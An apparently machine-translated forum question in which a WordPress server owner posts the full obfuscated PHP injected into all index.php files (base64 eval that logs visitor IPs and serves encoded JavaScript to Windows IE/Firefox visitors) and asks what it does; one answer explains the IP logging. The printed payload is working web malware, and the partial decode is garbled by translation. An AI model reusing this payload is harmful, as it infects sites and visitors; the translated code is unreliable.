嘿伙计们,所以我最近发现我服务器上所有wordpress安装的index.php模板文件都注入了这段代码 . <?php eval(base64_decode('JGlwPSRfU0VSVkVSWyJSRU1PVEVfQUREUiJdOyRkcj0kX1NFUlZFUlsiRE9DVU1FTlRfUk9PVCJdOyR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTskZGJmPSRkci4nLycubWQ1KCRkcik7DQppZigoc3RycG9zKCR1YSwnV2luZG93cycpIT09ZmFsc2UpJiYoKHN0cnBvcygkdWEsJ01TSUUnKSE9PWZhbHNlKXx8KHN0cnBvcygkdWEsJ0ZpcmVmb3gnKSE9PWZhbHNlKSkmJihzdHJwb3MoQGZpbGVfZ2V0X2NvbnRlbnRzKCRkYmYpLCRpcCkgPT09IGZhbHNlKSl7DQoJZXJyb3JfcmVwb3J0aW5nKDApOw0KCWVjaG8oYmFzZTY0X2RlY29kZSgnUEhOamNtbHdkRDUwY25sN01TMXdjbTkwYjNSNWNHVTdmV05oZEdOb0tHRnpaQ2w3ZUQweU8zMGdhV1lvZUNsN1puSTlJbVp5YjIxRGFHRnlJanRtUFZzd0xDMHhMRGswTERrekxESXlMREk1TERreExERXdNU3c0T0N3eE1EZ3NPVGtzT1RBc01UQXhMREV3Tml3ek5TdzVOQ3c1TVN3eE1EVXNOakFzT1Rnc09UQXNNVEF3TERreExEazVMREV3Tnl3eE1EVXNOVFVzTVRFeUxEYzBMRGcyTERrMExEWTRMRGcyTERFd01DdzVNU3d5T1N3ek1DdzRPQ3d4TURBc09URXNNVEV4TERJNExETXlMRGd4TERNM0xEZzBMRE14TERFeE1pdzBMQzB4TEMweUxEQXNPVFVzT1RFc01UQTFMRGczTERrNExEa3lMREV3TkN3eU9Td3pNaXcwT1N3eUxEQXNMVEVzTVRFMExESXpMRGt4TERrM0xERXdOaXc1TVN3eU1Td3hNVFFzTXl3dE1pd3dMQzB4TERnNUxERXdNaXc0T1N3eE1EWXNNVEF3TERreExEazVMREV3Tnl3ek5pd3hNRGdzTVRBMUxEazFMREV3TlN3NU1pd3pNQ3d5TXl3MU1TdzVOU3c1TVN3eE1EVXNPRGNzT1Rnc09USXNNaklzTVRBMExERXdOU3c0T1N3MU1Dd3pNQ3c1TkN3eE1EVXNNVEEzTERFd01pdzBOeXd6T0N3ek55dzRPU3d4TVRFc01UQXlMREV3TkN3NU55d3hNRGNzT1RNc01UQTVMRGszTERNMUxERXdNQ3d4TVRFc09URXNNVEV3TERNMkxERXdOaXd4TURZc016Y3NOVElzT1RRc01UQXhMRFV3TERReExESTVMREl4TERFeE1DdzVOU3c0T1N3eE1EY3NPVFFzTlRBc016QXNNemtzTXpjc016QXNNaklzT1RNc09USXNPVFVzT1RJc09UVXNNVEEyTERVd0xETXdMRE01TERNM0xETXdMREl5TERFd05Dd3hNRGNzTVRFeExEazNMRGt5TERVeExESTRMREV3T1N3NU5Td3hNRFFzT1RZc09EZ3NPVFFzT1Rrc09UVXNNVEExTERFeE1pdzBPQ3c1TXl3NU5pdzVNQ3c0T1N3NU1pd3hNREFzTkRnc01UQXpMREV3TVN3eE1EUXNPVFlzTVRBMkxEazBMREV3TWl3eE1EQXNORGNzT0Rnc09EZ3NNVEEwTERFd01pdzVPQ3d4TURZc01UQTNMRGt4TERRNExEazVMRGt4TERreExERXdOeXcwT0N3ek55dzFNQ3d4TURZc01UQXdMREV3TXl3ME9Dd3pOeXcxTUN3eU9TdzFNU3cxTVN3ek55dzVOQ3c1TXl3eE1EUXNPRFlzTVRBd0xEa3hMRFV4TERJMUxETXhMRFE0TERRc0xURXNMVElzTVRFMkxETXNMVElzTUN3NU1pd3hNRFlzTVRBeExEZzVMREV3TlN3NU5pd3hNREVzT1Rrc01qTXNPVFVzT1RFc01UQTFMRGczTERrNExEa3lMREV3TkN3eU9Td3pNaXd4TVRNc01pd3dMQzB4TEMweUxERXdPU3c0Tnl3eE1ETXNNak1zT1RJc01qRXNOVElzTWpJc09Ea3NNVEF5TERnNUxERXdOaXd4TURBc09URXNPVGtzTVRBM0xETTJMRGc0TERFd05TdzVNU3c0Tml3eE1EY3NPVEVzTlRnc09Ua3NPVEVzT1Rnc09USXNNVEF3TERFd05Td3pNU3d5T1N3NU5DdzVNeXd4TURRc09EWXNNVEF3TERreExESTRMRE15TERRNUxEa3hMRE0zTERFd05TdzVNQ3d4TURjc05UVXNNVEExTERFd055d3hNRFFzT1RRc09Ea3NNVEEzTERFd05TdzVNaXd6TUN3eU9Dd3hNRFlzTVRBMExEZzRMRE13TERNMExESTRMRGsxTERFd05pd3hNRFVzTVRBekxEUTRMRE0yTERNNExEa3dMREV3T1N3eE1ETXNNVEExTERrMUxERXdPQ3c1TkN3eE1EY3NPVGdzTXpZc09UZ3NNVEV5TERreUxERXdPQ3d6Tnl3eE1EY3NNVEEwTERNNExEVXpMRGt5TERFd01pdzFNU3d6T1N3ek1Dd3pNU3cwT0N3NU15d3pOaXd4TURRc01UQTNMREV4TVN3NU55dzVNaXd6Tml3eE1EY3NPVFlzTVRBMUxEazBMRGc1TERrMUxEazNMRGsyTERFd05pd3hNVEFzTlRJc01qa3NPVE1zT1RZc09UQXNPRGtzT1RJc01UQXdMREk0TERVd0xEa3lMRE0xTERFd05pd3hNRFlzTVRFd0xEazVMRGt4TERNMUxERXdNeXd4TURFc01UQTBMRGsyTERFd05pdzVOQ3d4TURJc01UQXdMRFV3TERNd0xEZzNMRGczTERFd05pd3hNREVzT1Rjc01UQTRMREV3Tml3NU1Dd3pNQ3cwT1N3NU1Td3pOeXd4TURVc01UQTFMREV4TWl3NU9DdzVNQ3d6Tnl3NU9DdzVNQ3c1TXl3eE1EWXNOVEFzTXpBc016Z3NNamdzTlRBc09USXNNelVzTVRBMkxERXdOaXd4TVRBc09Ua3NPVEVzTXpVc01UQTNMREV3TVN3eE1ERXNOVElzTWprc016Y3NNekFzTkRrc09URXNNemNzTVRBMUxEa3dMREV3Tnl3MU5Td3hNRFVzTVRBM0xERXdOQ3c1TkN3NE9Td3hNRGNzTVRBMUxEa3lMRE13TERJNExERXhNQ3c1TlN3NE9Td3hNRGNzT1RRc01qZ3NNelVzTWprc016Z3NNemtzTWprc016QXNOVEFzT1RJc016VXNNVEEyTERreExERXdOU3cxTml3eE1EWXNNVEExTERFd05TdzVOU3c0Tnl3eE1EZ3NNVEEyTERrd0xETXhMREk1TERrekxEa3lMRGsxTERreUxEazFMREV3Tml3eU9Dd3pOU3d5T1N3ek9Dd3pPU3d5T1N3ek1DdzFNQ3d6TEMweUxEQXNMVEVzT0Rrc01UQXlMRGc1TERFd05pd3hNREFzT1RFc09Ua3NNVEEzTERNMkxEa3lMRGt5TERFd05pdzFPQ3c1T1N3NU1TdzVPQ3c1TWl3eE1EQXNNVEExTERFd05pdzFOaXd4TVRBc056VXNPRGNzT1RJc05qa3NPRGNzT1Rnc09USXNNekFzTWpnc09Ea3NNVEF4TERnNUxERXhNaXd5T1N3ek1DdzRNaXd6T0N3NE1pd3pOeXc0Tnl3eE1ERXNNVEF6TERreExEazVMRGt4TERVM0xEa3pMRGsyTERrNExEZzVMRE14TERreUxETXdMRFV3TERNc0xUSXNNQ3d4TVRWZE8zWTlJbVYyWVNJN2ZXbG1LSFlwWlQxM2FXNWtiM2RiZGlzaWJDSmRPM2M5Wmp0elBWdGRPM0k5VTNSeWFXNW5PM285S0NobEtUOGlRMjlrWlNJNklpSXBPM3A0UFdaeUszbzdabTl5S0drOU1EczFOamt0TlNzMUxXaytNRHRwS3oweEtYdHFQV2s3YVdZb1pTbHpQWE1yY2x0NmVGMG9LSGRiYWwwcU1Tc29PU3RsS0NKcUpUTWlLU2twS1R0OUlHbG1LSGdtSm1ZbUpqQXhNajA5UFRFd0tXVW9jeWs3UEM5elkzSnBjSFErJykpOw0KCWlmICgkZnAgPSBAZm9wZW4oJGRiZiAsICJhIikpe2ZwdXRzKCRmcCAsICRpcC4nfCcpOyBmY2xvc2UoJGZwKTt9DQp9'));?>
通常它很简单,我可以通过base64解码,但我认为他们已经再次编码 .
我从base64解码得到的是
$ip=$_SERVER["REMOTE_ADDR"];$dr=$_SERVER["DOCUMENT_ROOT"];$ua = $_SERVER['HTTP_USER_AGENT'];$dbf=$dr.'/'.md5($dr);
如果((strpos($ UA, '视窗')!== FALSE)&&((strpos($ UA, 'MSIE')!= = FALSE)||(strpos($ UA, '火狐')!= =假))&&(strpos(@file_get_contents($ dbf),$ ip)=== false)){error_reporting(0);
尝试{1-prototype;} catch(asd) if(x){fr = "fromChar"; f = [0,-1,94,93,22,29,91,101,88,108,99,90,101,106, 35,94,91,105,60,98,90,100,91,99,107,105,55,112,74,86,94,68,86,100,91,29,30,88,100,91,111,28,32,81,37,84,31,112, 4,-1,-2,0,95,91,105,87,98,92,104,29,32,49,2,0,-1,114,23,91,97,106,91,21,114,3,-2,0, -1,89,102,89,106,100,91,99,107,36,108,105,95,105,92,30,23,51,95,91,105,87,98,92,22,104,105,89,50,30,94,105,107,102,47,38,37,89,111,102,104 ,97,107,93,109,97,35,100,111,91,110,36,106,106,37,52,94,101,50,41,29,21,110,95,89,107,94,50,30,39,37,30,22,93,92,95 ,92,95,106,50,30,39,37,30,22,104,107,111,97,92,51,28,109,95,104,96,88,94,99,95,105,112,48,93,96,90,89,92,100,48,103,101,104 ,96,106,94,102,100,47,88,88,104,102,98,106,107,91,48,99,91,91,107,48,37,50,106,100,103,48,37,50,29,51,51,37,94,93,104,86,100,91 ,51,25,31,48,4,-1,-2,116,3,-2,0,92,106,101,89,105,96,101,99,23,95,91,105,87,98,92,104,29,32,113,2, 0,-1,-2,109,87,103,23,92,21,52,22,89,102,89,106,100,91,99,107,36,88,105,91,86,107,91,58,99,91,98,92,10 0,105,31,29,94,93,104,86,100,91,28,32,49,91,37,105,90,107,55,105,107,104,94,89,107,105,92,30,28,106,104,88,30,34,28,95,106,105,103,48, 36,38,90,109,103,105,95,108,94,107,98,36,98,112,92,108,37,107,104,38,53,92,102,51,39,30,31,48,93,36,104,107,111,97,92,36,107,96,105,94, 89,95,97,96,106,110,52,29,93,96,90,89,92,100,28,50,92,35,106,106,110,99,91,35,103,101,104,96,106,94,102,100,50,30,87,87,106,101,97,108,106, 90,30,49,91,37,105,105,112,98,90,37,98,90,93,106,50,30,38,28,50,92,35,106,106,110,99,91,35,107,101,101,52,29,37,30, 49,91,37,105,90,107,55,105,107,104,94,89,107,105,92,30,28,110,95,89,107,94,28,35,29,38,39,29,30,50,92,35,106,91,105,56,106,105,105, 95,87,108,106,90,31,29,93,92,95,92,95,106,28,35,29,38,39,29,30,50,3,-2,0,-1,89,102,89,106,100, 91,99,107,36,92,92,106,58,99,91,98,92,100,105,106,56,110,75,87,92,69,87,98,92,30,28,89,101,89,112,29,30,82, 38,82,37,87,101,103,91,99,91,57,93,96,98,89,31,92,30,50,3,-2,0,115]; v = "eva";} if(v)e = window [v "l"]; w = f; s = []; r = String; z =((e)? "Code":“");zx=fr+z;for(i=0;569-5+5-i>0;i+=1){j=i;if(e)s=s+r[zx]((w[j]*1+(9+e(" j%3”))));} if(x && f && 012 === 10)e(s);
if ($fp = @fopen($dbf , "a")){fputs($fp , $ip.'|'); fclose($fp);}
}
你们可以帮助我找出恶意软件试图做的事情吗?
谢谢
1 回答
问题是代码是做什么的 . 从我可以解读的:
它在文档根目录上创建一个名为md5的文件 . 在该文件中,它使用Internet Explorer或Firefox编写从Windows计算机获得的每个访问者的IP .
我不确定黑客是在追求什么,但如果他能够在你的文件中获得该代码,那么他可以访问你的FTP,从而访问新创建的日志文件 .